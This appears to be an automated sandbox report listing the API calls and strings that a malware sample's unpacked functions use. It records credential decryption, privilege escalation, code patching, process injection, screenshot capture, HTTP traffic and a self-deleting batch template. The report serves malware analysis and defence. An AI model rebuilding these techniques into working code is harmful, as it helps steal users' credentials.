APIs

LoadLibraryW.KERNEL32(?), ref: 02819A1C
GetProcAddress.KERNEL32(?,?), ref: 02819A40
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 02819A78
lstrlenW.KERNEL32(?), ref: 02819A90
StrCmpNIW.SHLWAPI(?,?), ref: 02819AA4
lstrlenW.KERNEL32(?), ref: 02819ABA
memcpy.MSVCRT ref: 02819AC6
FreeLibrary.KERNEL32 ref: 02819ADC
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 02819B1B
NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 02819B57

Part of subcall function 02824ED1: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 02824EE5
Part of subcall function 02824ED1: PathUnquoteSpacesW.SHLWAPI(?), ref: 02824F4A
Part of subcall function 02824ED1: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 02824F59
Part of subcall function 02824ED1: LocalFree.KERNEL32(00000001), ref: 02824F6D

NetApiBufferFree.NETAPI32(?), ref: 02819C02

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Part of subcall function 02824461: PathSkipRootW.SHLWAPI(?), ref: 0282448B
Part of subcall function 02824461: GetFileAttributesW.KERNEL32(?), ref: 028244B8
Part of subcall function 02824461: CreateDirectoryW.KERNEL32(?,00000000), ref: 028244CC
Part of subcall function 02824461: SetLastError.KERNEL32(00000050), ref: 028244EF

Part of subcall function 02819633: LoadLibraryW.KERNEL32(?), ref: 02819657
Part of subcall function 02819633: GetProcAddress.KERNEL32(?,?), ref: 02819685
Part of subcall function 02819633: GetProcAddress.KERNEL32(?,?), ref: 0281969F
Part of subcall function 02819633: GetProcAddress.KERNEL32(?,?), ref: 028196BB
Part of subcall function 02819633: WTSGetActiveConsoleSessionId.KERNEL32 ref: 028196E8
Part of subcall function 02819633: FreeLibrary.KERNEL32 ref: 02819769

NetApiBufferFree.NETAPI32(00000000), ref: 02819C14
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 02819C33

Part of subcall function 0282B70A: CreateDirectoryW.KERNEL32(?,00000000), ref: 0282B783
Part of subcall function 0282B70A: SetFileAttributesW.KERNEL32(?), ref: 0282B7A2
Part of subcall function 0282B70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 0282B7B9
Part of subcall function 0282B70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 0282B7C6
Part of subcall function 0282B70A: CloseHandle.KERNEL32 ref: 0282B7FF

Part of subcall function 02817058: GetFileSizeEx.KERNEL32(00000000,?), ref: 0281708F
Part of subcall function 02817058: SetEndOfFile.KERNEL32 ref: 02817105
Part of subcall function 02817058: FlushFileBuffers.KERNEL32(?), ref: 02817110

Strings

.exe, xrefs: 02819BBC 02819C4D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281D2B1, Relevance: 27.2, APIs: 18, Instructions: 214

APIs

GetProcAddress.KERNEL32(?,?), ref: 0281D2D5
GetProcAddress.KERNEL32(?,?), ref: 0281D2F5
GetProcAddress.KERNEL32(?,?), ref: 0281D30E
GetProcAddress.KERNEL32(?,?), ref: 0281D327
GetProcAddress.KERNEL32(?,?), ref: 0281D340
GetProcAddress.KERNEL32(?,?), ref: 0281D359
GetProcAddress.KERNEL32(?,?), ref: 0281D376
GetProcAddress.KERNEL32(?,?), ref: 0281D393
GetProcAddress.KERNEL32(?,?), ref: 0281D3B0
GetProcAddress.KERNEL32(?,?), ref: 0281D3CD
GetProcAddress.KERNEL32(?,?), ref: 0281D3EA
GetProcAddress.KERNEL32(?,?), ref: 0281D407
GetProcAddress.KERNEL32(?,?), ref: 0281D424
GetProcAddress.KERNEL32(?,?), ref: 0281D441
GetProcAddress.KERNEL32(?,?), ref: 0281D45E
GetProcAddress.KERNEL32(?,?), ref: 0281D47B
GetProcAddress.KERNEL32(?,?), ref: 0281D498
GetProcAddress.KERNEL32(?,?), ref: 0281D4B5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819C8D, Relevance: 24.4, APIs: 10, Strings: 2, Instructions: 184

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02819CCE
PathRemoveFileSpecW.SHLWAPI(?), ref: 02819D17
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02819D3E
PathRemoveFileSpecW.SHLWAPI(?), ref: 02819D87
SetEvent.KERNEL32 ref: 02819D9A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02819DAD

Part of subcall function 0281E4B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0281E4E9
Part of subcall function 0281E4B6: Sleep.KERNEL32(000001F4), ref: 0281E57E

Part of subcall function 028244FB: FindFirstFileW.KERNEL32(?,?), ref: 0282452C
Part of subcall function 028244FB: FindNextFileW.KERNEL32(?,?), ref: 0282457E
Part of subcall function 028244FB: FindClose.KERNEL32 ref: 02824589
Part of subcall function 028244FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 02824595
Part of subcall function 028244FB: RemoveDirectoryW.KERNEL32(?), ref: 0282459C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02819DF1

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Part of subcall function 028210E0: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0282113B
Part of subcall function 028210E0: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 028211A5
Part of subcall function 028210E0: RegFlushKey.ADVAPI32(00000000), ref: 028211D3
Part of subcall function 028210E0: RegCloseKey.ADVAPI32(00000000), ref: 028211DA

CharToOemW.USER32(?,?), ref: 02819E6F
CharToOemW.USER32(?,?), ref: 02819E81
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 02819EEC

Part of subcall function 02815482: CharToOemW.USER32(?,?), ref: 028154C8
Part of subcall function 02815482: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 028154FF
Part of subcall function 02815482: CloseHandle.KERNEL32(000000FF), ref: 02815527
Part of subcall function 02815482: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 02815569
Part of subcall function 02815482: memset.MSVCRT ref: 0281557E
Part of subcall function 02815482: CloseHandle.KERNEL32(000000FF), ref: 028155B9

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 02819CEB
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 02819D5B

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028152FF, Relevance: 24.3, APIs: 8, Strings: 4, Instructions: 89

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 0281530F
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 0281532D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 02815339
memset.MSVCRT ref: 02815379
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 028153C6
CloseHandle.KERNEL32(?), ref: 028153DA
CloseHandle.KERNEL32(?), ref: 028153E0
FreeLibrary.KERNEL32 ref: 028153F4

Strings

userenv.dll, xrefs: 02815304
CreateEnvironmentBlock, xrefs: 02815327
DestroyEnvironmentBlock, xrefs: 02815333
D, xrefs: 028153BA

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0283611F, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 261

APIs

Part of subcall function 0282C43C: lstrlenW.KERNEL32 ref: 0282C443
Part of subcall function 0282C43C: memcpy.MSVCRT ref: 0282C4D1

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

getpeername.WS2_32(?,?,?), ref: 02836361

Part of subcall function 0283306E: memcmp.MSVCRT ref: 02833090

lstrcpyW.KERNEL32(?,0:0), ref: 028363E9

Part of subcall function 02833C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 02833C98
Part of subcall function 02833C83: StrCmpIW.SHLWAPI(?,?), ref: 02833CA2

Part of subcall function 02832755: EnterCriticalSection.KERNEL32(02843510,?,028330AF,?,?,00000000), ref: 02832765
Part of subcall function 02832755: LeaveCriticalSection.KERNEL32(02843510,?,00000000), ref: 0283278F

WSAAddressToStringW.WS2_32(?,?,00000000), ref: 028363D5

Strings

mSER, xrefs: 02836176
hASS, xrefs: 0283617D
U, xrefs: 028361F1
lYPE, xrefs: 02836279
~EAT, xrefs: 02836280
hASV, xrefs: 02836287
kTAT, xrefs: 028362C3
tIST, xrefs: 028362CA
0, xrefs: 028363C4
0:0, xrefs: 028363DF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815482, Relevance: 22.5, APIs: 6, Strings: 5, Instructions: 109

APIs

Part of subcall function 0280E35B: GetTempPathW.KERNEL32(00000104,?), ref: 0280E376
Part of subcall function 0280E35B: PathAddBackslashW.SHLWAPI(?), ref: 0280E3A0
Part of subcall function 0280E35B: CreateDirectoryW.KERNEL32(?), ref: 0280E457
Part of subcall function 0280E35B: SetFileAttributesW.KERNEL32(?), ref: 0280E468
Part of subcall function 0280E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 0280E481
Part of subcall function 0280E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 0280E492

CharToOemW.USER32(?,?), ref: 028154C8
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 028154FF

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

CloseHandle.KERNEL32(000000FF), ref: 02815527
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 02815569
memset.MSVCRT ref: 0281557E
CloseHandle.KERNEL32(000000FF), ref: 028155B9

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

Part of subcall function 0280E348: CloseHandle.KERNEL32 ref: 0280E354

Strings

.bat, xrefs: 0281549C
@echo off%sdel /F "%s", xrefs: 028154D9
/c "%s", xrefs: 02815534
ComSpec, xrefs: 02815564
D, xrefs: 0281559E

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02835C75, Relevance: 22.3, APIs: 6, Strings: 5, Instructions: 60

APIs

LoadLibraryW.KERNEL32(cabinet.dll), ref: 02835C89

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

GetProcAddress.KERNEL32(?,FCICreate), ref: 02835CB8
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 02835CC7
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 02835CD6
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 02835CE5

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

FreeLibrary.KERNEL32 ref: 02835D1A

Strings

cabinet.dll, xrefs: 02835C84
FCICreate, xrefs: 02835CB1
FCIAddFile, xrefs: 02835CBD
FCIFlushCabinet, xrefs: 02835CCC
FCIDestroy, xrefs: 02835CDB

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281357D, Relevance: 21.5, APIs: 12, Instructions: 144

APIs

Part of subcall function 02816861: memchr.MSVCRT ref: 0281689D
Part of subcall function 02816861: memcmp.MSVCRT ref: 028168BC

VirtualProtect.KERNEL32(?,028137D4,00000080,?), ref: 028135ED
VirtualProtect.KERNEL32(?,028137D4,00000000,?), ref: 02813756

Part of subcall function 02816A7D: memcpy.MSVCRT ref: 02816A9C

Part of subcall function 02816B09: memcmp.MSVCRT ref: 02816B29

GetCurrentThread.KERNEL32 ref: 028136AC
GetThreadPriority.KERNEL32 ref: 028136B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 028136C6
Sleep.KERNEL32(00000000), ref: 028136CA
memcpy.MSVCRT ref: 028136D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 028136EA
SetThreadPriority.KERNEL32 ref: 028136F2

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

GetTickCount.KERNEL32 ref: 0281370D
GetTickCount.KERNEL32 ref: 0281371A
Sleep.KERNEL32(00000000), ref: 02813727

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281338D, Relevance: 20.3, APIs: 7, Strings: 3, Instructions: 143

APIs

GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 028133AB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 028133B6
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 028133C1

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

lstrcmpiW.KERNEL32(?), ref: 0281344E
memcpy.MSVCRT ref: 02813471

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0281349C
memcpy.MSVCRT ref: 028134CA

Strings

GdipGetImageEncodersSize, xrefs: 0281339C
GdipGetImageEncoders, xrefs: 028133AD
GdipSaveImageToStream, xrefs: 028133B8

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282B33E, Relevance: 20.3, APIs: 8, Strings: 2, Instructions: 107

APIs

memcpy.MSVCRT ref: 0282B364
CreateFileMappingW.KERNEL32(000000FF,?,08000004,00000000,00001000,00000000), ref: 0282B385
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00001000), ref: 0282B39D

Part of subcall function 0282AF22: UnmapViewOfFile.KERNEL32 ref: 0282AF2E
Part of subcall function 0282AF22: CloseHandle.KERNEL32 ref: 0282AF3F

memset.MSVCRT ref: 0282B3F2
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 0282B42B

Part of subcall function 0282AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,0283F128), ref: 0282AF7C
Part of subcall function 0282AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 0282AF9C
Part of subcall function 0282AF4A: memset.MSVCRT ref: 0282B039
Part of subcall function 0282AF4A: memcpy.MSVCRT ref: 0282B04B

ResumeThread.KERNEL32(?), ref: 0282B44E
CloseHandle.KERNEL32(?), ref: 0282B465
CloseHandle.KERNEL32(?), ref: 0282B46B

Strings

-m%p, xrefs: 0282B3CD
D, xrefs: 0282B423

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028150C0, Relevance: 18.5, APIs: 8, Strings: 1, Instructions: 60

APIs

GetCurrentThread.KERNEL32 ref: 028150D4
OpenThreadToken.ADVAPI32 ref: 028150DB
GetCurrentProcess.KERNEL32 ref: 028150EB
OpenProcessToken.ADVAPI32 ref: 028150F2
LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 02815113
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 02815128
GetLastError.KERNEL32 ref: 02815132
CloseHandle.KERNEL32(00000001), ref: 02815143

Strings

SeTcbPrivilege, xrefs: 02815106

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280ADFB, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184

APIs

GetLogicalDrives.KERNEL32 ref: 0280AE0F

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

SHGetFolderPathW.SHELL32(00000000,00006024,00000000,00000000,?), ref: 0280AE54
PathGetDriveNumberW.SHLWAPI(?), ref: 0280AE66
lstrcpyW.KERNEL32(?,028075B0), ref: 0280AE7A
GetDriveTypeW.KERNEL32(?), ref: 0280AEE3
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000105), ref: 0280AF44
CharUpperW.USER32(?), ref: 0280AF60
lstrcmpW.KERNEL32(?), ref: 0280AF83
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 0280AFC1

Strings

#, xrefs: 0280AE9E

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281F23B, Relevance: 16.5, APIs: 9, Instructions: 176

APIs

lstrlenW.KERNEL32 ref: 0281F31C

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0281F389

Part of subcall function 02833D5A: memcpy.MSVCRT ref: 02833D94

LocalFree.KERNEL32(?), ref: 0281F3A7
lstrlenW.KERNEL32(?), ref: 0281F410

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

#6.OLEAUT32 ref: 0281F432
#6.OLEAUT32(?), ref: 0281F438
#6.OLEAUT32 ref: 0281F43B
#6.OLEAUT32(?), ref: 0281F441
#6.OLEAUT32 ref: 0281F444

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028208C0, Relevance: 16.3, APIs: 7, Strings: 1, Instructions: 146

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

Part of subcall function 02816A7D: memcpy.MSVCRT ref: 02816A9C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02820934
PathRemoveFileSpecW.SHLWAPI(?), ref: 02820982
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 028209F8
GetLastError.KERNEL32(?,?,?,00000000,3D94878D), ref: 02820A05
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02820A2F
FlushFileBuffers.KERNEL32 ref: 02820A49
CloseHandle.KERNEL32 ref: 02820A50

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 02820956

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02818F66, Relevance: 16.3, APIs: 3, Strings: 5, Instructions: 75

APIs

Part of subcall function 02818E45: InternetCloseHandle.WININET ref: 02818E57

HttpOpenRequestA.WININET(?,?,?,HTTP/1.1,00000000,02807BD8,?,00000000), ref: 02818FA7
HttpAddRequestHeadersA.WININET(?,Connection: Close,00000013,A0000000), ref: 02818FCA
HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 0281900C

Strings

HTTP/1.1, xrefs: 02818F8E
GET, xrefs: 02818F96
POST, xrefs: 02818F9B
Connection: Close, xrefs: 02818FC4
(, xrefs: 02819005

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280B74D, Relevance: 16.0, APIs: 9, Instructions: 112

APIs

GetProcAddress.KERNEL32(?,?), ref: 0280B76F
GetProcAddress.KERNEL32(?,?), ref: 0280B791
GetProcAddress.KERNEL32(?,?), ref: 0280B7AC
GetProcAddress.KERNEL32(?,?), ref: 0280B7C7
GetProcAddress.KERNEL32(?,?), ref: 0280B7E2
GetProcAddress.KERNEL32(?,?), ref: 0280B7FD
GetProcAddress.KERNEL32(?,?), ref: 0280B81C
GetProcAddress.KERNEL32(?,?), ref: 0280B83B
GetProcAddress.KERNEL32(?,?), ref: 0280B85A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282B0C1, Relevance: 16.0, APIs: 9, Instructions: 103

APIs

GetCommandLineW.KERNEL32 ref: 0282B0DB
CommandLineToArgvW.SHELL32 ref: 0282B0E2
StrCmpNW.SHLWAPI(?,02807F1C,00000002), ref: 0282B108
LocalFree.KERNEL32 ref: 0282B134

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 0282B171
memcpy.MSVCRT ref: 0282B184

Part of subcall function 0282F8BA: memcpy.MSVCRT ref: 0282F8E7

UnmapViewOfFile.KERNEL32 ref: 0282B1BD
CloseHandle.KERNEL32 ref: 0282B1F9

Part of subcall function 0282B562: memset.MSVCRT ref: 0282B587
Part of subcall function 0282B562: memcpy.MSVCRT ref: 0282B5E7
Part of subcall function 0282B562: memcpy.MSVCRT ref: 0282B5FF
Part of subcall function 0282B562: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 0282B66A
Part of subcall function 0282B562: memcpy.MSVCRT ref: 0282B6A8

memcpy.MSVCRT ref: 0282B1E0

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819152, Relevance: 16.0, APIs: 9, Instructions: 98

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 02819173

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

CloseHandle.KERNEL32 ref: 02819198
SetLastError.KERNEL32(00000008,?,?,?,?,02820646,?,?,?,?), ref: 028191A0
WaitForSingleObject.KERNEL32(?,00000000), ref: 028191BD
InternetReadFile.WININET(?,?,00001000,?), ref: 028191DB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02819210
FlushFileBuffers.KERNEL32 ref: 02819229

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

CloseHandle.KERNEL32 ref: 0281923C
SetLastError.KERNEL32(00000000,?,?,00001000,?,?,?,?,02820646,?,?,?,?), ref: 02819257

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280B392, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 230

APIs

Part of subcall function 02830741: CoInitializeEx.OLE32(00000000,00000000), ref: 0283074E

Part of subcall function 02819F57: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,0280B41A,?), ref: 02819F69
Part of subcall function 02819F57: #2.OLEAUT32(0280B41A,00000000,?,?,?,0280B41A,?), ref: 02819F9D
Part of subcall function 02819F57: #6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0280B41A,?), ref: 02819FD2
Part of subcall function 02819F57: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02819FF2

#2.OLEAUT32(WQL,?), ref: 0280B480
#2.OLEAUT32(?,?), ref: 0280B49C
#6.OLEAUT32(?,?,00000030,00000000,?), ref: 0280B4CC
#9.OLEAUT32(?), ref: 0280B53D

Part of subcall function 02819F2C: #6.OLEAUT32(?,00000000,0280B574), ref: 02819F49
Part of subcall function 02819F2C: CoUninitialize.OLE32 ref: 0283078C

memcpy.MSVCRT ref: 0280B616
memcpy.MSVCRT ref: 0280B628
memcpy.MSVCRT ref: 0280B63A

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

Strings

WQL, xrefs: 0280B47B
displayName, xrefs: 0280B50A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02824214, Relevance: 15.1, APIs: 5, Strings: 2, Instructions: 97

APIs

EnterCriticalSection.KERNEL32(02843510,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 0282422E
LeaveCriticalSection.KERNEL32(02843510,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 02824261

Part of subcall function 0281DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 0281DEC9
Part of subcall function 0281DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0281DED5
Part of subcall function 0281DEBB: SetLastError.KERNEL32(00000001,028242C8,02842954,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 0281DEED

CoTaskMemFree.OLE32(00000000), ref: 028242F6
PathRemoveBackslashW.SHLWAPI(?), ref: 02824303
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0282431A

Strings

SHGetKnownFolderPath, xrefs: 028242B9
shell32.dll, xrefs: 028242BE

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280869E, Relevance: 15.1, APIs: 10, Instructions: 53

APIs

VirtualProtect.KERNEL32(?,028137D4,00000000,?), ref: 02813756

Part of subcall function 02816B09: memcmp.MSVCRT ref: 02816B29

GetCurrentThread.KERNEL32 ref: 028136AC
GetThreadPriority.KERNEL32 ref: 028136B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 028136C6
Sleep.KERNEL32(00000000), ref: 028136CA
memcpy.MSVCRT ref: 028136D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 028136EA
SetThreadPriority.KERNEL32 ref: 028136F2

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

GetTickCount.KERNEL32 ref: 0281370D
GetTickCount.KERNEL32 ref: 0281371A
Sleep.KERNEL32(00000000), ref: 02813727

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028308D2, Relevance: 15.0, APIs: 8, Instructions: 103

APIs

getpeername.WS2_32(?,?,?), ref: 02830909
getsockname.WS2_32(?,?,?), ref: 02830926
memcpy.MSVCRT ref: 02830949
memcpy.MSVCRT ref: 02830956
memcpy.MSVCRT ref: 02830976
memcpy.MSVCRT ref: 02830983
memset.MSVCRT ref: 02830993
memcpy.MSVCRT ref: 028309E3

Part of subcall function 02816BFF: send.WS2_32(?,?,00000015,00000000), ref: 02816C07

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282432D, Relevance: 14.8, APIs: 5, Instructions: 98

APIs

memcpy.MSVCRT ref: 0282439E
PathRemoveBackslashW.SHLWAPI ref: 028243A8
memcpy.MSVCRT ref: 028243F1
memcpy.MSVCRT ref: 0282441E
PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280E717, Relevance: 14.7, APIs: 5, Strings: 2, Instructions: 89

APIs

memcpy.MSVCRT ref: 0280E775
memcpy.MSVCRT ref: 0280E78A
memcpy.MSVCRT ref: 0280E79F
memcpy.MSVCRT ref: 0280E7AE

